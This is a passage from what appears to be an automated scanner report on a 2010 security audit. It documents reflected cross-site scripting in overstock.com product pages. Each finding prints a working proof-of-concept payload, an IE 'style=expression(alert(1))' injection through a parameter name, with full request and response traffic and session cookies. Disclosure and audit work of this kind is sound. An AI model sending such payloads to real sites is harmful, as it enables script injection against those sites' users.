Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:00 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408220458:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: mxcproclicks=4878052|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ur
...[SNIP]...
<input type="hidden" name="9552e"style="x:expression(alert(1))"a9a967e2da5" value="1"/>
...[SNIP]...

2.80. http://www.overstock.com/Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a7e"style%3d"x%3aexpression(alert(1))"95e7139af68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7a7e"style="x:expression(alert(1))"95e7139af68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html?f7a7e"style%3d"x%3aexpression(alert(1))"95e7139af68=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:43 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:43 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408203348:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:43 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4081944|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:43 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=27
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110724

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Wa
...[SNIP]...
<input type="hidden" name="f7a7e"style="x:expression(alert(1))"95e7139af68" value="1"/>
...[SNIP]...

2.81. http://www.overstock.com/Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e70"style%3d"x%3aexpression(alert(1))"e7ffcc6a332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9e70"style="x:expression(alert(1))"e7ffcc6a332 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html?e9e70"style%3d"x%3aexpression(alert(1))"e7ffcc6a332=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:06:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:06:01 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405161531:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4254548|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="e9e70"style="x:expression(alert(1))"e7ffcc6a332" value="1"/>
...[SNIP]...

2.82. http://www.overstock.com/Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a7c0"style%3d"x%3aexpression(alert(1))"55a54c4c9d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a7c0"style="x:expression(alert(1))"55a54c4c9d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html?6a7c0"style%3d"x%3aexpression(alert(1))"55a54c4c9d8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:07:53 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:07:53 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289405273805:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:53 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5146644|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:53 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="6a7c0"style="x:expression(alert(1))"55a54c4c9d8" value="1"/>
...[SNIP]...

2.83. http://www.overstock.com/Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9deef"style%3d"x%3aexpression(alert(1))"ea5e7c90a99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9deef"style="x:expression(alert(1))"ea5e7c90a99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html?9deef"style%3d"x%3aexpression(alert(1))"ea5e7c90a99=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:40 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:40 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4395190|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:40 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405140440:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109825

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="9deef"style="x:expression(alert(1))"ea5e7c90a99" value="1"/>
...[SNIP]...

2.84. http://www.overstock.com/Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3a38"style%3d"x%3aexpression(alert(1))"338037914d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3a38"style="x:expression(alert(1))"338037914d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html?f3a38"style%3d"x%3aexpression(alert(1))"338037914d3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:06:08 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:06:08 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5088223|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:08 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405168551:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:08 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113075

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="f3a38"style="x:expression(alert(1))"338037914d3" value="1"/>
...[SNIP]...

2.85. http://www.overstock.com/Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e1ad"style%3d"x%3aexpression(alert(1))"a49a46f4b40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e1ad"style="x:expression(alert(1))"a49a46f4b40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html?4e1ad"style%3d"x%3aexpression(alert(1))"a49a46f4b40=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:43 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:43 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408803560:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2677829|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:43 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:43 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="4e1ad"style="x:expression(alert(1))"a49a46f4b40" value="1"/>
...[SNIP]...

2.86. http://www.overstock.com/Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efaab"style%3d"x%3aexpression(alert(1))"b871a7a300a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as efaab"style="x:expression(alert(1))"b871a7a300a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html?efaab"style%3d"x%3aexpression(alert(1))"b871a7a300a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:06:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:06:01 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4363751|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
